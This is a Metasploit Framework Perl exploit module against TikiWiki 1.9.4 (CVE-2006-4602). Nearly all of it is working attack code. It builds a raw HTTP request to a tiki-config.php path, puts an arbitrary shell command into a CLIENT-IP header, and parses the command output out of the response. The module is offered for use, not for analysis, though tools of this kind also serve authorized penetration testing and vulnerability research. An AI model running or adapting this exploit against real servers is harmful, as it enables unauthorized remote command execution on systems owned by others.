##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::tikiwiki_remote_exec;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
	'Name'     => 'Tikiwiki remote command execution',
	'Version'  => '$Rev: $',
	'Authors'  => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
	'Arch'     => [ ],
	'OS'       => [ ],
	'Priv'     => 0,
	'UserOpts' => 
	{
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
		'DIR'   => [1, 'DATA', 'Tikiwiki directory path', '/tikiwiki'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	},

	'Description' => Pex::Text::Freeform(qq{
		TikiWiki contains a flaw that may allow a malicious user to execute
		arbitrary PHP code. The issue is triggered due to the jhot.php script
		not correctly verifying uploaded files. It is possible that the flaw
		may allow arbitrary PHP code execution by uploading a malicious PHP
		script resulting in a loss of integrity.

		The vulnerability has been reported in Tikiwiki version 1.9.4.
	}),

	'Refs' => 
	[
		['OSVDB', '28456'],
		['BID', '19819'],
		['CVE', '2006-4602'],
		['MIL', '2288'],
		['URL', 'http://secunia.com/advisories/21733/'],
	],

	'Payload' =>
	{
		'Space' => 512,
		'Keys'  => ['cmd'],
	},

	'Keys' => ['tikiwiki'],

	'DisclosureDate' => 'Sep 2 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host    = $self->VHost;
	my $target_port    = $self->GetVar('RPORT');
	my $dir            = $self->GetVar('DIR');
	my $encodedPayload = $self->GetVar('EncodedPayload');
        my $cmd            = $encodedPayload->RawPayload;

	my $rpath = "/img/wiki/tiki-config.php";
	$dir = $dir.$rpath;

	my $request =
		"GET $dir HTTP/1.1\r\n".
		"Accept: */*\r\n".
		"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
		"Host: $target_host:$target_port\r\n".
		"CLIENT-IP: $cmd\r\n".
		"Connection: Close\r\n".
		"\r\n";
	
	my $s = Msf::Socket::Tcp->new(
		'PeerAddr' => $target_host,
		'PeerPort' => $target_port,
		'SSL'      => $self->GetVar('SSL'),
	);

	if ($s->IsError){
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$self->PrintLine("[*] Establishing a connection to the target...");

	$s->Send($request);

	my $results = $s->Recv(-1, 20);
	
	$self->PrintLine("[*] Execute the command : ".$cmd);
	$self->PrintLine("");

	if ($results){
		if ($results =~ /my_delim/){
			(undef, $results) = split(/my_delim/, $results);
			$self->PrintLine($results);
		} else {
			$self->PrintLine('[*] Could not execute command. Target does not seem to be vulnerable.');
		}
	} else {
		$self->PrintLine('[*] Could not execute command. Target does not seem to be vulnerable.');
	}

	$s->Close();

	return;
}

sub VHost {
	my $self = shift;
	my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
	return $name;
}

1;